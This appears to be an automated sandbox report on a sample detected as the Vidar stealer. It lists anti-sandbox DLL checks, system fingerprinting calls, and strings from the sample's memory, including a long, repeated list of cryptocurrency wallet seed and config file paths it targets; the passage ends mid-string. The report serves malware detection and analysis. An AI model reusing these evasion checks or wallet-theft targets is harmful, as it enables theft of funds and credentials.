Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe	Binary or memory string: DIR_WATCH.DLL
Source: file.exe	Binary or memory string: SBIEDLL.DLL
Source: file.exe	Binary or memory string: API_LOG.DLL
Source: file.exe	Binary or memory string: <EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION4@

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004022FC FindFirstFileA,	0_2_004022FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00429305 FindFirstFileA,	0_2_00429305
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00425791 FindFirstFileA,FindFirstFileA,	0_2_00425791
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043A85B FindFirstFileA,memset,memset,	0_2_0043A85B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00423AC1 FindFirstFileA,	0_2_00423AC1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00426E63 FindFirstFileA,	0_2_00426E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004024A9 FindFirstFileA,	0_2_004024A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004288E9 FindFirstFileA,FindFirstFileA,	0_2_004288E9

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0043A05D GetLogicalDriveStringsA,

0_2_0043A05D

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0042EE1F GetSystemInfo,wsprintfA,wsprintfA,

0_2_0042EE1F

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: GCFCFC.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: file.exe, 00000000.00000002.2643455185.0000000000816000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: GCFCFC.0.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: GCFCFC.0.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: GCFCFC.0.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: GCFCFC.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: GCFCFC.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: GCFCFC.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: GCFCFC.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: GCFCFC.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: GCFCFC.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: GCFCFC.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: GCFCFC.0.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, 00000000.00000002.2643455185.0000000000842000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: GCFCFC.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: GCFCFC.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: GCFCFC.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: GCFCFC.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: GCFCFC.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: GCFCFC.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: GCFCFC.0.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: GCFCFC.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: GCFCFC.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: GCFCFC.0.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: GCFCFC.0.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: VMwareVMware
Source: GCFCFC.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: GCFCFC.0.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: GCFCFC.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: GCFCFC.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: GCFCFC.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: GCFCFC.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: GCFCFC.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: GCFCFC.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004015DF mov eax, dword ptr fs:[00000030h]	0_2_004015DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401661 mov eax, dword ptr fs:[00000030h]	0_2_00401661
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040190C test dword ptr fs:[00000030h], 00000068h	0_2_0040190C

Source: C:\Users\user\Desktop\file.exe

Code function: GetLocaleInfoA,

0_2_0042DF9F

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0042ED59 GetUserNameA,

0_2_0042ED59

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0042D415 GetTimeZoneInformation,

0_2_0042D415

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1500882253.0000000000857000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7516, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: Electrum
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \Electrum\wallets\
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: ElectrumLTC
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: \Ethereum\
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: Ethereum
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session 